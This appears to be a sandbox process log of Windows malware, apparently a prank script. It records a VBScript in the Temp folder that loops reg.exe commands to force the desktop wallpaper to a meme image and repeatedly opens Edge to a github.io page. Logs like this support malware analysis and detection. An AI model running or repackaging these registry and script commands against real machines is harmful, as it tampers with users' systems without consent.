"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2032 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
